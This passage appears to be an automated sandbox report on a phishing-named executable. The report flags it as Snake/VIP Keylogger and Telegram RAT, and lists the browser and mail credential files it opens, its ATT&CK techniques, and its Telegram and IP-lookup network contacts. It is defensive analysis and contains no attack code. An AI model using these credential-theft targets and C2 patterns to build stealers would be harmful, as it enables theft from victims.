              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00774E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00774E87
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00781E06 GetUserNameW,0_2_00781E06
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_00773F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00773F3A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007449A0
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8012, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTR
              Yara detected VIP Keylogger
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: alarmingness.exeBinary or memory string: WIN_81
              Source: alarmingness.exeBinary or memory string: WIN_XP
              Source: alarmingness.exeBinary or memory string: WIN_XPe
              Source: alarmingness.exeBinary or memory string: WIN_VISTA
              Source: alarmingness.exeBinary or memory string: WIN_7
              Source: alarmingness.exeBinary or memory string: WIN_8
              Source: alarmingness.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3640181514.0000000002B8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3639719090.0000000002D3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8012, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 00000003.00000002.3640181514.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3640181514.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3639719090.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8012, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTR
              Yara detected VIP Keylogger
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3637703138.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTR
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007B6283
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: 0_2_007B6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007B6747
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FF6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00FF6283
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FF6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00FF6747

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		2
              Valid Accounts              		1
              Native API              		111
              Scripting              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		4
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts              		2
              Valid Accounts              		31
              Obfuscated Files or Information              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron2
              Registry Run Keys / Startup Folder              		21
              Access Token Manipulation              		1
              DLL Side-Loading              		NTDS127
              System Information Discovery              		Distributed Component Object Model21
              Input Capture              		3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
              Process Injection              		11
              Masquerading              		LSA Secrets231
              Security Software Discovery              		SSH3
              Clipboard Data              		14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
              Registry Run Keys / Startup Folder              		2
              Valid Accounts              		Cached Domain Credentials11
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Virtualization/Sandbox Evasion              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634995 Sample: New Order RFQ- 19A20060.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 2 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 12 other signatures 2->52 8 New Order RFQ- 19A20060.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\...\alarmingness.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 14 alarmingness.exe 2 8->14         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 18 alarmingness.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\alarmingness.vbs, data 14->28 dropped 62 Antivirus detection for dropped file 14->62 64 Multi AV Scanner detection for dropped file 14->64 66 Binary is likely a compiled AutoIt script file 14->66 72 2 other signatures 14->72 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 api.telegram.org 149.154.167.220, 443, 49751, 49756 TELEGRAMRU United Kingdom 20->36 38 checkip.dyndns.com 193.122.6.168, 49713, 49718, 49721 ORACLE-BMC-31898US United States 20->38 40 reallyfreegeoip.org 104.21.112.1, 443, 49714, 49716 CLOUDFLARENETUS United States 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.